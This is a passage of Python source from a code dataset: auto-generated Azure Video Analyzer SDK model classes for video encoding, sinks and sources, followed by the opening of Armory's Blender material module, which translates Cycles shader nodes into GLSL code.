self.segment_length = kwargs.get('segment_length', None)
self.retention_period = kwargs.get('retention_period', None)
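# Illustrative sketch (editor's note, not part of the generated models): creation properties
# for a live video resource using the ISO8601 durations discussed above (30-second segments,
# 30-day retention). Title and description are placeholders.
def _example_video_creation_properties():
    return VideoCreationProperties(
        title="Parking lot camera",
        description="Footage archived from the parking lot RTSP camera.",
        segment_length="PT30S",
        retention_period="P30D",
    )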
class VideoEncoderBase(msrest.serialization.Model):
"""Base type for all video encoding presets, which define the recipe or instructions on how the input video should be processed.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: VideoEncoderH264.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param bitrate_kbps: The maximum bitrate, in kilobits per second or Kbps, at which video should
be encoded. If omitted, the encoder sets it automatically to try to match the quality of the input
video.
:type bitrate_kbps: str
:param frame_rate: The frame rate (in frames per second) of the encoded video. The value must
be greater than zero, and less than or equal to 300. If omitted, the encoder uses the average
frame rate of the input video.
:type frame_rate: str
:param scale: Describes the resolution of the encoded video. If omitted, the encoder uses the
resolution of the input video.
:type scale: ~video_analyzer.models.VideoScale
"""
_validation = {
'type': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'bitrate_kbps': {'key': 'bitrateKbps', 'type': 'str'},
'frame_rate': {'key': 'frameRate', 'type': 'str'},
'scale': {'key': 'scale', 'type': 'VideoScale'},
}
_subtype_map = {
'type': {'#Microsoft.VideoAnalyzer.VideoEncoderH264': 'VideoEncoderH264'}
}
def __init__(
self,
**kwargs
):
super(VideoEncoderBase, self).__init__(**kwargs)
self.type = None # type: Optional[str]
self.bitrate_kbps = kwargs.get('bitrate_kbps', None)
self.frame_rate = kwargs.get('frame_rate', None)
self.scale = kwargs.get('scale', None)
class VideoEncoderH264(VideoEncoderBase):
"""A custom preset for encoding video with the H.264 (AVC) codec.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param bitrate_kbps: The maximum bitrate, in kilobits per second (Kbps), at which video should
be encoded. If omitted, the encoder sets it automatically to try to match the quality of the
input video.
:type bitrate_kbps: str
:param frame_rate: The frame rate (in frames per second) of the encoded video. The value must
be greater than zero, and less than or equal to 300. If omitted, the encoder uses the average
frame rate of the input video.
:type frame_rate: str
:param scale: Describes the resolution of the encoded video. If omitted, the encoder uses the
resolution of the input video.
:type scale: ~video_analyzer.models.VideoScale
"""
_validation = {
'type': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'bitrate_kbps': {'key': 'bitrateKbps', 'type': 'str'},
'frame_rate': {'key': 'frameRate', 'type': 'str'},
'scale': {'key': 'scale', 'type': 'VideoScale'},
}
def __init__(
self,
**kwargs
):
super(VideoEncoderH264, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.VideoEncoderH264' # type: str
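# Illustrative sketch (assumption, not generated code): an H.264 encoding preset.
# All values are strings per the attribute maps above; VideoScale is defined later
# in this module, which is fine because this helper is never called at import time.
def _example_video_encoder_h264():
    return VideoEncoderH264(
        bitrate_kbps='2000',   # cap at roughly 2 Mbps; omit to let the encoder choose
        frame_rate='30',       # must be greater than zero and at most 300
        scale=VideoScale(height='720', mode='PreserveAspectRatio'),
    )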
class VideoEntity(ProxyResource):
"""Represents a video resource within Azure Video Analyzer. Videos can be ingested from RTSP cameras through live pipelines or can be created by exporting sequences from existing captured video through a pipeline job. Videos ingested through live pipelines can be streamed through Azure Video Analyzer Player Widget or compatible players. Exported videos can be downloaded as MP4 files.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or
"Microsoft.Storage/storageAccounts".
:vartype type: str
:ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy
information.
:vartype system_data: ~video_analyzer.models.SystemData
:param title: Optional video title provided by the user. Value can be up to 256 characters
long.
:type title: str
:param description: Optional video description provided by the user. Value can be up to 2048
characters long.
:type description: str
:ivar type_properties_type: Video content type. Different content types are suitable for
different applications and scenarios. Possible values include: "Archive", "File".
:vartype type_properties_type: str or ~video_analyzer.models.VideoType
:ivar flags: Video flags contain information about the available video actions and its dynamic
properties based on the current video state.
:vartype flags: ~video_analyzer.models.VideoFlags
:ivar content_urls: Set of URLs to the video content.
:vartype content_urls: ~video_analyzer.models.VideoContentUrls
:param media_info: Contains information about the video and audio content.
:type media_info: ~video_analyzer.models.VideoMediaInfo
:param archival: Video archival properties.
:type archival: ~video_analyzer.models.VideoArchival
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'system_data': {'readonly': True},
'type_properties_type': {'readonly': True},
'flags': {'readonly': True},
'content_urls': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'system_data': {'key': 'systemData', 'type': 'SystemData'},
'title': {'key': 'properties.title', 'type': 'str'},
'description': {'key': 'properties.description', 'type': 'str'},
'type_properties_type': {'key': 'properties.type', 'type': 'str'},
'flags': {'key': 'properties.flags', 'type': 'VideoFlags'},
'content_urls': {'key': 'properties.contentUrls', 'type': 'VideoContentUrls'},
'media_info': {'key': 'properties.mediaInfo', 'type': 'VideoMediaInfo'},
'archival': {'key': 'properties.archival', 'type': 'VideoArchival'},
}
def __init__(
self,
**kwargs
):
super(VideoEntity, self).__init__(**kwargs)
self.title = kwargs.get('title', None)
self.description = kwargs.get('description', None)
self.type_properties_type = None
self.flags = None
self.content_urls = None
self.media_info = kwargs.get('media_info', None)
self.archival = kwargs.get('archival', None)
class VideoEntityCollection(msrest.serialization.Model):
"""A collection of VideoEntity items.
:param value: A collection of VideoEntity items.
:type value: list[~video_analyzer.models.VideoEntity]
:param next_link: A link to the next page of the collection (when the collection contains too
many results to return in one response).
:type next_link: str
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[VideoEntity]'},
'next_link': {'key': '@nextLink', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(VideoEntityCollection, self).__init__(**kwargs)
self.value = kwargs.get('value', None)
self.next_link = kwargs.get('next_link', None)
class VideoFlags(msrest.serialization.Model):
"""Video flags contain information about the available video actions and its dynamic properties based on the current video state.
All required parameters must be populated in order to send to Azure.
:param can_stream: Required. Value indicating whether or not the video can be streamed. Only
"archive" type videos can be streamed.
:type can_stream: bool
:param has_data: Required. Value indicating whether or not there has ever been data recorded or
uploaded into the video. Newly created videos have this value set to false.
:type has_data: bool
:param is_in_use: Required. Value indicating whether or not the video is currently being
referenced by an active pipeline. The fact that it is being referenced doesn't necessarily
indicate that data is being received. For example, video recording may be gated on events, or
the camera may not be accessible at the time.
:type is_in_use: bool
"""
_validation = {
'can_stream': {'required': True},
'has_data': {'required': True},
'is_in_use': {'required': True},
}
_attribute_map = {
'can_stream': {'key': 'canStream', 'type': 'bool'},
'has_data': {'key': 'hasData', 'type': 'bool'},
'is_in_use': {'key': 'isInUse', 'type': 'bool'},
}
def __init__(
self,
**kwargs
):
super(VideoFlags, self).__init__(**kwargs)
self.can_stream = kwargs['can_stream']
self.has_data = kwargs['has_data']
self.is_in_use = kwargs['is_in_use']
class VideoMediaInfo(msrest.serialization.Model):
"""Contains information about the video and audio content.
:param segment_length: Video segment length indicates the length of individual video files
(segments) which are persisted to storage. Smaller segments provide lower archive playback
latency but generate a larger volume of storage transactions. Larger segments reduce the
number of storage transactions while increasing the archive playback latency. Value must be
specified in ISO8601 duration format (e.g. "PT30S" equals 30 seconds) and can vary between
30 seconds and 5 minutes, in 30 second increments.
:type segment_length: str
"""
_attribute_map = {
'segment_length': {'key': 'segmentLength', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(VideoMediaInfo, self).__init__(**kwargs)
self.segment_length = kwargs.get('segment_length', None)
class VideoPreviewImageUrls(msrest.serialization.Model):
"""Video preview image URLs. These URLs can be used in conjunction with the video content authorization token to download the most recent still image from the video archive in different resolutions. They are available when the video type is 'archive' and preview images are enabled.
:param small: Low resolution preview image URL.
:type small: str
:param medium: Medium resolution preview image URL.
:type medium: str
:param large: High resolution preview image URL.
:type large: str
"""
_attribute_map = {
'small': {'key': 'small', 'type': 'str'},
'medium': {'key': 'medium', 'type': 'str'},
'large': {'key': 'large', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(VideoPreviewImageUrls, self).__init__(**kwargs)
self.small = kwargs.get('small', None)
self.medium = kwargs.get('medium', None)
self.large = kwargs.get('large', None)
class VideoPublishingOptions(msrest.serialization.Model):
"""Optional flags used to change how video is published. These are only allowed for topologies where "kind" is set to "live".
:param disable_archive: When set to 'true' content will not be archived or recorded. This is
used, for example, when the topology is used only for low latency video streaming. Default is
'false'. If set to 'true', then "disableRtspPublishing" must be set to 'false'.
:type disable_archive: str
:param disable_rtsp_publishing: When set to 'true' the RTSP playback URL will not be published,
disabling low latency streaming. This is used, for example, when the topology is used only for
archiving content. Default is 'false'. If set to 'true', then "disableArchive" must be set to
'false'.
:type disable_rtsp_publishing: str
"""
_attribute_map = {
'disable_archive': {'key': 'disableArchive', 'type': 'str'},
'disable_rtsp_publishing': {'key': 'disableRtspPublishing', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(VideoPublishingOptions, self).__init__(**kwargs)
self.disable_archive = kwargs.get('disable_archive', None)
self.disable_rtsp_publishing = kwargs.get('disable_rtsp_publishing', None)
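# Illustrative sketch (assumption): publishing options for a low-latency-only live
# topology. Note the documented constraint that disable_archive and
# disable_rtsp_publishing cannot both be 'true'.
def _example_video_publishing_options():
    return VideoPublishingOptions(
        disable_archive='true',           # do not record content to storage
        disable_rtsp_publishing='false',  # keep the low latency RTSP playback URL
    )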
class VideoScale(msrest.serialization.Model):
"""The video scaling information.
:param height: The desired output video height.
:type height: str
:param width: The desired output video width.
:type width: str
:param mode: Describes the video scaling mode to be applied. Default mode is 'Pad'. If the mode
is 'Pad' or 'Stretch' then both width and height must be specified. Else if the mode is
'PreserveAspectRatio' then only one of width or height need be provided. Possible values
include: "Pad", "PreserveAspectRatio", "Stretch".
:type mode: str or ~video_analyzer.models.VideoScaleMode
"""
_attribute_map = {
'height': {'key': 'height', 'type': 'str'},
'width': {'key': 'width', 'type': 'str'},
'mode': {'key': 'mode', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(VideoScale, self).__init__(**kwargs)
self.height = kwargs.get('height', None)
self.width = kwargs.get('width', None)
self.mode = kwargs.get('mode', None)
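# Illustrative sketch (assumption): with mode 'PreserveAspectRatio' only one of
# width/height is required; 'Pad' and 'Stretch' need both, per the docstring above.
def _example_video_scale():
    return VideoScale(height='1080', mode='PreserveAspectRatio')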
class VideoSequenceAbsoluteTimeMarkers(TimeSequenceBase):
"""A sequence of absolute datetime ranges as a string. The datetime values should follow IS08601, and the sum of the ranges should add up to 24 hours or less. Currently, there can be only one range specified in the sequence.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param ranges: Required. The sequence of datetime ranges. Example: '[["2021-10-05T03:30:00Z",
"2021-10-05T03:40:00Z"]]'.
:type ranges: str
"""
_validation = {
'type': {'required': True},
'ranges': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'ranges': {'key': 'ranges', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(VideoSequenceAbsoluteTimeMarkers, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.VideoSequenceAbsoluteTimeMarkers' # type: str
self.ranges = kwargs['ranges']
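# Illustrative sketch (assumption): 'ranges' is a JSON-style string holding one
# datetime range; the summed ranges must not exceed 24 hours.
def _example_time_markers():
    return VideoSequenceAbsoluteTimeMarkers(
        ranges='[["2021-10-05T03:30:00Z", "2021-10-05T03:40:00Z"]]',
    )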
class VideoSink(SinkNodeBase):
"""Video sink in a live topology allows for video and audio to be captured, optionally archived, and published via a video resource. If archiving is enabled, this results in a video of type 'archive'. If used in a batch topology, this allows for video and audio to be stored as a file, and published via a video resource of type 'file'.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param name: Required. Node name. Must be unique within the topology.
:type name: str
:param inputs: Required. An array of upstream node references within the topology to be used as
inputs for this node.
:type inputs: list[~video_analyzer.models.NodeInput]
:param video_name: Required. Name of a new or existing video resource used to capture and
publish content. Note: if the sink is downstream of an RTSP source and disableArchive is set to
true, then no content is archived.
:type video_name: str
:param video_creation_properties: Optional video properties to be used in case a new video
resource needs to be created on the service.
:type video_creation_properties: ~video_analyzer.models.VideoCreationProperties
:param video_publishing_options: Options to change how the video sink publishes content via the
video resource. This property is only allowed for topologies where "kind" is set to "live".
:type video_publishing_options: ~video_analyzer.models.VideoPublishingOptions
"""
_validation = {
'type': {'required': True},
'name': {'required': True},
'inputs': {'required': True},
'video_name': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'inputs': {'key': 'inputs', 'type': '[NodeInput]'},
'video_name': {'key': 'videoName', 'type': 'str'},
'video_creation_properties': {'key': 'videoCreationProperties', 'type': 'VideoCreationProperties'},
'video_publishing_options': {'key': 'videoPublishingOptions', 'type': 'VideoPublishingOptions'},
}
def __init__(
self,
**kwargs
):
super(VideoSink, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.VideoSink' # type: str
self.video_name = kwargs['video_name']
self.video_creation_properties = kwargs.get('video_creation_properties', None)
self.video_publishing_options = kwargs.get('video_publishing_options', None)
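# Illustrative sketch (assumption): a video sink wired to an upstream node named
# 'rtspSource', reusing the helpers sketched above. NodeInput(node_name=...) is
# assumed to be the upstream-reference model defined elsewhere in this module.
def _example_video_sink():
    return VideoSink(
        name='videoSink',
        inputs=[NodeInput(node_name='rtspSource')],
        video_name='camera001',
        video_creation_properties=_example_video_creation_properties(),
        video_publishing_options=_example_video_publishing_options(),
    )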
class VideoSource(SourceNodeBase):
"""Video source allows for content from a Video Analyzer video resource to be ingested into a pipeline. Currently supported only with batch pipelines.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param name: Required. Node name. Must be unique within the topology.
:type name: str
:param video_name: Required. Name of the Video Analyzer video resource to be used as the
source.
:type video_name: str
:param time_sequences: Required. Describes a sequence of datetime ranges. The video source only
picks up recorded media within these ranges.
:type time_sequences: ~video_analyzer.models.TimeSequenceBase
"""
_validation = {
'type': {'required': True},
'name': {'required': True},
'video_name': {'required': True},
'time_sequences': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'video_name': {'key': 'videoName', 'type': 'str'},
'time_sequences': {'key': 'timeSequences', 'type': 'TimeSequenceBase'},
}
def __init__(
self,
**kwargs
):
super(VideoSource, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.VideoSource' # type: str
self.video_name = kwargs['video_name']
self.time_sequences = kwargs['time_sequences']
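# Illustrative sketch (assumption): a batch-pipeline source reading a bounded time
# window from an existing video resource, using the time markers sketched above.
def _example_video_source():
    return VideoSource(
        name='videoSource',
        video_name='camera001',
        time_sequences=_example_time_markers(),
    )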
| [] |
philipmduarte/armory | blender/arm/material/cycles.py | 675211c66a1e49147226ccb472a6f5dc87b7db02 | #
# This module builds upon Cycles nodes work licensed as
# Copyright 2011-2013 Blender Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import math
import bpy
import os
import arm.assets
import arm.utils
import arm.make_state
import arm.log
import arm.material.mat_state as mat_state
import arm.material.cycles_functions as c_functions
import shutil
emission_found = False
particle_info = None # Particle info export
def parse(nodes, con, vert, frag, geom, tesc, tese, parse_surface=True, parse_opacity=True, parse_displacement=True, basecol_only=False):
output_node = node_by_type(nodes, 'OUTPUT_MATERIAL')
if output_node != None:
parse_output(output_node, con, vert, frag, geom, tesc, tese, parse_surface, parse_opacity, parse_displacement, basecol_only)
def parse_output(node, _con, _vert, _frag, _geom, _tesc, _tese, _parse_surface, _parse_opacity, _parse_displacement, _basecol_only):
global parsed # Compute nodes only once
global parents
global normal_parsed
global curshader # Active shader - frag for surface / tese for displacement
global con
global vert
global frag
global geom
global tesc
global tese
global parse_surface
global parse_opacity
global basecol_only
global emission_found
global particle_info
global sample_bump
global sample_bump_res
con = _con
vert = _vert
frag = _frag
geom = _geom
tesc = _tesc
tese = _tese
parse_surface = _parse_surface
parse_opacity = _parse_opacity
basecol_only = _basecol_only
emission_found = False
particle_info = {}
particle_info['index'] = False
particle_info['age'] = False
particle_info['lifetime'] = False
particle_info['location'] = False
particle_info['size'] = False
particle_info['velocity'] = False
particle_info['angular_velocity'] = False
sample_bump = False
sample_bump_res = ''
wrd = bpy.data.worlds['Arm']
# Surface
if parse_surface or parse_opacity:
parsed = {}
parents = []
normal_parsed = False
curshader = frag
out_basecol, out_roughness, out_metallic, out_occlusion, out_specular, out_opacity, out_emission = parse_shader_input(node.inputs[0])
if parse_surface:
frag.write('basecol = {0};'.format(out_basecol))
frag.write('roughness = {0};'.format(out_roughness))
frag.write('metallic = {0};'.format(out_metallic))
frag.write('occlusion = {0};'.format(out_occlusion))
frag.write('specular = {0};'.format(out_specular))
if '_Emission' in wrd.world_defs:
frag.write('emission = {0};'.format(out_emission))
if parse_opacity:
frag.write('opacity = {0} - 0.0002;'.format(out_opacity))
# Volume
# parse_volume_input(node.inputs[1])
# Displacement
if _parse_displacement and disp_enabled() and node.inputs[2].is_linked:
parsed = {}
parents = []
normal_parsed = False
rpdat = arm.utils.get_rp()
if rpdat.arm_rp_displacement == 'Tessellation' and tese != None:
curshader = tese
else:
curshader = vert
out_disp = parse_displacement_input(node.inputs[2])
curshader.write('vec3 disp = {0};'.format(out_disp))
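# The helpers below walk the material node graph recursively: parse_input() dispatches
# on socket type, parse_group()/parse_group_input() enter and leave node groups via the
# global 'parents' stack, and texture fetches/node results are cached in the global
# 'parsed' dict (reset per pass) so repeated links do not re-emit shader code.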
def parse_group(node, socket): # Entering group
index = socket_index(node, socket)
output_node = node_by_type(node.node_tree.nodes, 'GROUP_OUTPUT')
if output_node == None:
return
inp = output_node.inputs[index]
parents.append(node)
out_group = parse_input(inp)
parents.pop()
return out_group
def parse_group_input(node, socket):
index = socket_index(node, socket)
parent = parents.pop() # Leaving group
inp = parent.inputs[index]
res = parse_input(inp)
parents.append(parent) # Return to group
return res
def parse_input(inp):
if inp.type == 'SHADER':
return parse_shader_input(inp)
elif inp.type == 'RGB':
return parse_vector_input(inp)
elif inp.type == 'RGBA':
return parse_vector_input(inp)
elif inp.type == 'VECTOR':
return parse_vector_input(inp)
elif inp.type == 'VALUE':
return parse_value_input(inp)
def parse_shader_input(inp):
if inp.is_linked:
l = inp.links[0]
if l.from_node.type == 'REROUTE':
return parse_shader_input(l.from_node.inputs[0])
return parse_shader(l.from_node, l.from_socket)
else:
out_basecol = 'vec3(0.8)'
out_roughness = '0.0'
out_metallic = '0.0'
out_occlusion = '1.0'
out_specular = '1.0'
out_opacity = '1.0'
out_emission = '0.0'
return out_basecol, out_roughness, out_metallic, out_occlusion, out_specular, out_opacity, out_emission
def parse_shader(node, socket):
global emission_found
out_basecol = 'vec3(0.8)'
out_roughness = '0.0'
out_metallic = '0.0'
out_occlusion = '1.0'
out_specular = '1.0'
out_opacity = '1.0'
out_emission = '0.0'
if node.type == 'GROUP':
if node.node_tree.name.startswith('Armory PBR'):
if parse_surface:
# Base color
out_basecol = parse_vector_input(node.inputs[0])
# Occlusion
out_occlusion = parse_value_input(node.inputs[2])
# Roughness
out_roughness = parse_value_input(node.inputs[3])
# Metallic
out_metallic = parse_value_input(node.inputs[4])
# Normal
if node.inputs[5].is_linked and node.inputs[5].links[0].from_node.type == 'NORMAL_MAP':
warn(mat_name() + ' - Do not use Normal Map node with Armory PBR, connect Image Texture directly')
parse_normal_map_color_input(node.inputs[5])
# Emission
if node.inputs[6].is_linked or node.inputs[6].default_value != 0.0:
out_emission = parse_value_input(node.inputs[6])
emission_found = True
if parse_opacity:
out_opacity = parse_value_input(node.inputs[1])
else:
return parse_group(node, socket)
elif node.type == 'GROUP_INPUT':
return parse_group_input(node, socket)
elif node.type == 'MIX_SHADER':
prefix = '' if node.inputs[0].is_linked else 'const '
fac = parse_value_input(node.inputs[0])
fac_var = node_name(node.name) + '_fac'
fac_inv_var = node_name(node.name) + '_fac_inv'
curshader.write('{0}float {1} = {2};'.format(prefix, fac_var, fac))
curshader.write('{0}float {1} = 1.0 - {2};'.format(prefix, fac_inv_var, fac_var))
bc1, rough1, met1, occ1, spec1, opac1, emi1 = parse_shader_input(node.inputs[1])
bc2, rough2, met2, occ2, spec2, opac2, emi2 = parse_shader_input(node.inputs[2])
if parse_surface:
out_basecol = '({0} * {3} + {1} * {2})'.format(bc1, bc2, fac_var, fac_inv_var)
out_roughness = '({0} * {3} + {1} * {2})'.format(rough1, rough2, fac_var, fac_inv_var)
out_metallic = '({0} * {3} + {1} * {2})'.format(met1, met2, fac_var, fac_inv_var)
out_occlusion = '({0} * {3} + {1} * {2})'.format(occ1, occ2, fac_var, fac_inv_var)
out_specular = '({0} * {3} + {1} * {2})'.format(spec1, spec2, fac_var, fac_inv_var)
out_emission = '({0} * {3} + {1} * {2})'.format(emi1, emi2, fac_var, fac_inv_var)
if parse_opacity:
out_opacity = '({0} * {3} + {1} * {2})'.format(opac1, opac2, fac_var, fac_inv_var)
elif node.type == 'ADD_SHADER':
bc1, rough1, met1, occ1, spec1, opac1, emi1 = parse_shader_input(node.inputs[0])
bc2, rough2, met2, occ2, spec2, opac2, emi2 = parse_shader_input(node.inputs[1])
if parse_surface:
out_basecol = '({0} + {1})'.format(bc1, bc2)
out_roughness = '({0} * 0.5 + {1} * 0.5)'.format(rough1, rough2)
out_metallic = '({0} * 0.5 + {1} * 0.5)'.format(met1, met2)
out_occlusion = '({0} * 0.5 + {1} * 0.5)'.format(occ1, occ2)
out_specular = '({0} * 0.5 + {1} * 0.5)'.format(spec1, spec2)
out_emission = '({0} * 0.5 + {1} * 0.5)'.format(emi1, emi2)
if parse_opacity:
out_opacity = '({0} * 0.5 + {1} * 0.5)'.format(opac1, opac2)
elif node.type == 'BSDF_PRINCIPLED':
if parse_surface:
write_normal(node.inputs[19])
out_basecol = parse_vector_input(node.inputs[0])
# subsurface = parse_vector_input(node.inputs[1])
# subsurface_radius = parse_vector_input(node.inputs[2])
# subsurface_color = parse_vector_input(node.inputs[3])
out_metallic = parse_value_input(node.inputs[4])
out_specular = parse_value_input(node.inputs[5])
# specular_tint = parse_vector_input(node.inputs[6])
out_roughness = parse_value_input(node.inputs[7])
# aniso = parse_vector_input(node.inputs[8])
# aniso_rot = parse_vector_input(node.inputs[9])
# sheen = parse_vector_input(node.inputs[10])
# sheen_tint = parse_vector_input(node.inputs[11])
# clearcoat = parse_vector_input(node.inputs[12])
# clearcoat_rough = parse_vector_input(node.inputs[13])
# ior = parse_vector_input(node.inputs[14])
# transmission = parse_vector_input(node.inputs[15])
# transmission_roughness = parse_vector_input(node.inputs[16])
if node.inputs[17].is_linked or node.inputs[17].default_value[0] != 0.0:
out_emission = '({0}.x)'.format(parse_vector_input(node.inputs[17]))
emission_found = True
# clearcoat_normal = parse_vector_input(node.inputs[20])
# tangent = parse_vector_input(node.inputs[21])
if parse_opacity:
if len(node.inputs) > 20:
out_opacity = parse_value_input(node.inputs[18])
elif node.type == 'BSDF_DIFFUSE':
if parse_surface:
write_normal(node.inputs[2])
out_basecol = parse_vector_input(node.inputs[0])
out_roughness = parse_value_input(node.inputs[1])
out_specular = '0.0'
elif node.type == 'BSDF_GLOSSY':
if parse_surface:
write_normal(node.inputs[2])
out_basecol = parse_vector_input(node.inputs[0])
out_roughness = parse_value_input(node.inputs[1])
out_metallic = '1.0'
elif node.type == 'AMBIENT_OCCLUSION':
if parse_surface:
# Single channel
out_occlusion = parse_vector_input(node.inputs[0]) + '.r'
elif node.type == 'BSDF_ANISOTROPIC':
if parse_surface:
write_normal(node.inputs[4])
# Revert to glossy
out_basecol = parse_vector_input(node.inputs[0])
out_roughness = parse_value_input(node.inputs[1])
out_metallic = '1.0'
elif node.type == 'EMISSION':
if parse_surface:
# Multiply basecol
out_basecol = parse_vector_input(node.inputs[0])
out_emission = '1.0'
emission_found = True
emission_strength = parse_value_input(node.inputs[1])
out_basecol = '({0} * {1})'.format(out_basecol, emission_strength)
elif node.type == 'BSDF_GLASS':
if parse_surface:
write_normal(node.inputs[3])
out_roughness = parse_value_input(node.inputs[1])
if parse_opacity:
out_opacity = '(1.0 - {0}.r)'.format(parse_vector_input(node.inputs[0]))
elif node.type == 'BSDF_HAIR':
pass
elif node.type == 'HOLDOUT':
if parse_surface:
# Occlude
out_occlusion = '0.0'
elif node.type == 'BSDF_REFRACTION':
# write_normal(node.inputs[3])
pass
elif node.type == 'SUBSURFACE_SCATTERING':
if parse_surface:
write_normal(node.inputs[4])
out_basecol = parse_vector_input(node.inputs[0])
elif node.type == 'BSDF_TOON':
# write_normal(node.inputs[3])
pass
elif node.type == 'BSDF_TRANSLUCENT':
if parse_surface:
write_normal(node.inputs[1])
if parse_opacity:
out_opacity = '(1.0 - {0}.r)'.format(parse_vector_input(node.inputs[0]))
elif node.type == 'BSDF_TRANSPARENT':
if parse_opacity:
out_opacity = '(1.0 - {0}.r)'.format(parse_vector_input(node.inputs[0]))
elif node.type == 'BSDF_VELVET':
if parse_surface:
write_normal(node.inputs[2])
out_basecol = parse_vector_input(node.inputs[0])
out_roughness = '1.0'
out_metallic = '1.0'
elif node.type == 'VOLUME_ABSORPTION':
pass
elif node.type == 'VOLUME_SCATTER':
pass
return out_basecol, out_roughness, out_metallic, out_occlusion, out_specular, out_opacity, out_emission
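# Note: parse_shader()/parse_shader_input() return a 7-tuple of GLSL expression strings
# in the order (basecol, roughness, metallic, occlusion, specular, opacity, emission);
# parse_output() assigns them to the corresponding fragment shader variables.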
def parse_displacement_input(inp):
if inp.is_linked:
l = inp.links[0]
if l.from_node.type == 'REROUTE':
return parse_displacement_input(l.from_node.inputs[0])
return parse_vector_input(inp)
else:
return None
def parse_vector_input(inp):
if inp.is_linked:
l = inp.links[0]
if l.from_node.type == 'REROUTE':
return parse_vector_input(l.from_node.inputs[0])
res_var = write_result(l)
st = l.from_socket.type
if st == 'RGB' or st == 'RGBA' or st == 'VECTOR':
return res_var
else: # VALUE
return 'vec3({0})'.format(res_var)
else:
if inp.type == 'VALUE': # Unlinked reroute
return to_vec3([0.0, 0.0, 0.0])
else:
if mat_batch() and inp.is_uniform:
return to_uniform(inp)
else:
return to_vec3(inp.default_value)
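# parse_vector_input() always yields a vec3 expression: scalar results are promoted with
# vec3(...), unlinked sockets fall back to the socket default colour (or a uniform when
# material batching is enabled), and unlinked VALUE sockets become vec3(0.0).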
def parse_vector(node, socket):
global particle_info
global sample_bump
global sample_bump_res
# RGB
if node.type == 'GROUP':
return parse_group(node, socket)
elif node.type == 'GROUP_INPUT':
return parse_group_input(node, socket)
elif node.type == 'VERTEX_COLOR':
con.add_elem('col', 'short4norm') # Vcols only for now
return 'vcolor'
elif node.type == 'ATTRIBUTE':
if socket == node.outputs[0]: # Color
con.add_elem('col', 'short4norm') # Vcols only for now
return 'vcolor'
else: # Vector
con.add_elem('tex', 'short2norm') # UVMaps only for now
mat = mat_get_material()
mat_users = mat_get_material_users()
if mat_users != None and mat in mat_users:
mat_user = mat_users[mat][0]
if hasattr(mat_user.data, 'uv_layers'): # No uvlayers for Curve
lays = mat_user.data.uv_layers
# Second uvmap referenced
if len(lays) > 1 and node.attribute_name == lays[1].name:
con.add_elem('tex1', 'short2norm')
return 'vec3(texCoord1.x, 1.0 - texCoord1.y, 0.0)'
return 'vec3(texCoord.x, 1.0 - texCoord.y, 0.0)'
elif node.type == 'RGB':
if node.arm_material_param:
nn = 'param_' + node_name(node.name)
curshader.add_uniform('vec3 {0}'.format(nn), link='{0}'.format(node.name))
return nn
else:
return to_vec3(socket.default_value)
elif node.type == 'TEX_BRICK':
curshader.add_function(c_functions.str_tex_brick)
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
col1 = parse_vector_input(node.inputs[1])
col2 = parse_vector_input(node.inputs[2])
col3 = parse_vector_input(node.inputs[3])
scale = parse_value_input(node.inputs[4])
res = 'tex_brick({0} * {4}, {1}, {2}, {3})'.format(co, col1, col2, col3, scale)
if sample_bump:
write_bump(node, res)
return res
elif node.type == 'TEX_CHECKER':
curshader.add_function(c_functions.str_tex_checker)
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
col1 = parse_vector_input(node.inputs[1])
col2 = parse_vector_input(node.inputs[2])
scale = parse_value_input(node.inputs[3])
res = 'tex_checker({0}, {1}, {2}, {3})'.format(co, col1, col2, scale)
if sample_bump:
write_bump(node, res)
return res
elif node.type == 'TEX_ENVIRONMENT':
# Pass through
return to_vec3([0.0, 0.0, 0.0])
elif node.type == 'TEX_GRADIENT':
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
